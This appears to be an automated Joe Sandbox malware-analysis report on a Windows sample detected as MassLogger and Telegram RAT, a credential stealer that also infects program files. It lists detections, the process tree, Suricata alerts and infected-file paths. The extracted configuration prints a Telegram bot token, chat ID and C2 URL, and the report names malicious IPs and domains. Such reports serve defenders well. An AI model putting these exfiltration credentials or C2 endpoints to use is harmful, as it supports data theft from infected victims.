Edit tour

Windows Analysis Report
SABXJ1B5c8.exe

Overview

General Information

Sample name:	SABXJ1B5c8.exe renamed because original name is a hash value
Original sample name:	dff12e1840c3265f14378662e2dbd2e1cad4aa31027ff29056a42964adda27c6.exe
Analysis ID:	1588133
MD5:	5742ab086dc8f6e149625cb4af899678
SHA1:	89680c76c0e33ac54a1932df4bfb7aa3e2ee0746
SHA256:	dff12e1840c3265f14378662e2dbd2e1cad4aa31027ff29056a42964adda27c6
Tags:	exeWormm0yvuser-adrian__luca
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files inside the volume driver (system volume information)

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SABXJ1B5c8.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\SABXJ1B5c8.exe" MD5: 5742AB086DC8F6E149625CB4AF899678)

RegSvcs.exe (PID: 4068 cmdline: "C:\Users\user\Desktop\SABXJ1B5c8.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

armsvc.exe (PID: 6760 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: E5F7971641A9B95E117EDC9226944C29)

alg.exe (PID: 3644 cmdline: C:\Windows\System32\alg.exe MD5: 135921C8C6E6F42106E2AC61EE0D0612)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 3064 cmdline: C:\Windows\system32\AppVClient.exe MD5: 0E6695AE9B36C10F1BA14DBAD66572E9)

FXSSVC.exe (PID: 3560 cmdline: C:\Windows\system32\fxssvc.exe MD5: E72AE34F3044B7578B086D583E378596)

elevation_service.exe (PID: 5652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: F658B7D7CBCE308B133C9A2238E1C99E)

maintenanceservice.exe (PID: 5460 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: DE04250FA2299A6D9B6C11E1BF4926F3)

msdtc.exe (PID: 5752 cmdline: C:\Windows\System32\msdtc.exe MD5: 077870CDAFB7A6CEE9112FA39CCF50BF)

PerceptionSimulationService.exe (PID: 5520 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 3D61E604A56C70F50B3C6D3E307619E6)

perfhost.exe (PID: 572 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: D2EB808FBCC7D13A4EA0C8C57F14F0DF)

Locator.exe (PID: 5364 cmdline: C:\Windows\system32\locator.exe MD5: 71243E5DD99FDE1B251313A997589A0A)

SensorDataService.exe (PID: 5896 cmdline: C:\Windows\System32\SensorDataService.exe MD5: D30BDBDB141F003C278042E5C6B4C4D9)

snmptrap.exe (PID: 5560 cmdline: C:\Windows\System32\snmptrap.exe MD5: 5444F05919224257A311E1B66F090E3A)

ssh-agent.exe (PID: 5464 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: E745AF96DAB2A5AB6546745352847398)

TieringEngineService.exe (PID: 3064 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: B7E7D630B8756D5CBF242AABEB71EFD2)

AgentService.exe (PID: 4380 cmdline: C:\Windows\system32\AgentService.exe MD5: F961BCB08DA0BBC74AD876A875708B98)

vds.exe (PID: 7088 cmdline: C:\Windows\System32\vds.exe MD5: 4F54A0CCDE62E37349E5E85A31E34B3B)

wbengine.exe (PID: 2040 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 121726021DB13232851EB2ED69D08172)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xef73:$a1: get_encryptedPassword 0xf29b:$a2: get_encryptedUsername 0xed0e:$a3: get_timePasswordChanged 0xee2f:$a4: get_passwordField 0xef89:$a5: set_encryptedPassword 0x108e5:$a7: get_logins 0x10596:$a8: GetOutlookPasswords 0x10388:$a9: StartKeylogger 0x10835:$a10: KeyLoggerEventArgs 0x103e5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 4068	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 4068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4068	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 4068	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5f387:$a1: get_encryptedPassword 0x5f6a0:$a2: get_encryptedUsername 0x5f136:$a3: get_timePasswordChanged 0x5f257:$a4: get_passwordField 0x5f39d:$a5: set_encryptedPassword 0x60ca0:$a7: get_logins 0x60951:$a8: GetOutlookPasswords 0x60743:$a9: StartKeylogger 0x60bf0:$a10: KeyLoggerEventArgs 0x607a0:$a11: KeyLoggerEventArgsEventHandler
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:41:36.323846+0100	2051649	1	A Network Trojan was detected	192.168.2.11	55887	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:41:34.264252+0100	2051648	1	A Network Trojan was detected	192.168.2.11	58700	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:41:07.296417+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.11	49713	TCP
2025-01-10T21:41:34.229522+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.11	49717	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:41:07.296417+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.11	49713	TCP
2025-01-10T21:41:34.229522+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.11	49717	TCP

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:41:04.450864+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.11	49711	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:40:55.160825+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49705	158.101.44.242	80	TCP
2025-01-10T21:41:02.540229+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49705	158.101.44.242	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:41:07.190805+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.11	49713	18.141.10.107	80	TCP
2025-01-10T21:42:22.641223+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.11	49813	82.112.184.197	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:41:03.863721+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49711	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SABXJ1B5c8.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://54.244.188.177/t	Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODYwMDA0	Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717	Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVk	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/xifbrctmnvq	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/f	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/illjjcn	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
Source: RegSvcs.exe.4068.17.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}

Multi AV Scanner detection for submitted file

Source: SABXJ1B5c8.exe	Virustotal: Detection: 68%			Perma Link
Source: SABXJ1B5c8.exe	ReversingLabs: Detection: 84%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SABXJ1B5c8.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SABXJ1B5c8.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49706 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49711 version: TLS 1.2

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.2154203886.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1561293289.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000002.00000003.2259687828.0000000000860000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2238224443.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2239453490.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000002.00000003.1801097699.0000000002030000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: armsvc.exe, 00000002.00000003.1672501273.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000002.00000003.1985712542.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000002.00000003.1985712542.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.2002492724.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1609720901.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1664251039.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000002.00000003.2305241014.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2308488352.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: plugin-container.pdb source: armsvc.exe, 00000002.00000003.2520947525.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: armsvc.exe, 00000002.00000003.2448751622.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.1935345072.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000002.00000003.2148688241.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000002.00000003.2291707252.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000002.00000003.2168802476.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2160376496.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source:	Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.1713083112.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000002.00000003.2051863988.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000002.00000003.1809580259.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: CNFNOT32.EXE.2.dr
Source:	Binary string: pingsender.pdb source: armsvc.exe, 00000002.00000003.2505901701.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: SABXJ1B5c8.exe, 00000000.00000003.1597532692.0000000004150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000002.00000003.2002492724.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000002.00000003.1823253916.0000000001AD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdb source: armsvc.exe, 00000002.00000003.2528548821.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000002.00000003.1809580259.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wbengine.pdb source: wbengine.exe.2.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000002.00000003.2259687828.0000000000860000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2238224443.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2239453490.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\ocpubmgr.pdb source: OcPubMgr.exe.2.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000002.00000003.1935345072.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000002.00000003.2073828065.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000002.00000003.1801097699.0000000002030000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: armsvc.exe, 00000002.00000003.2305241014.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2308488352.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2136445285.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.2485744889.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: armsvc.exe, 00000002.00000003.2476177945.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
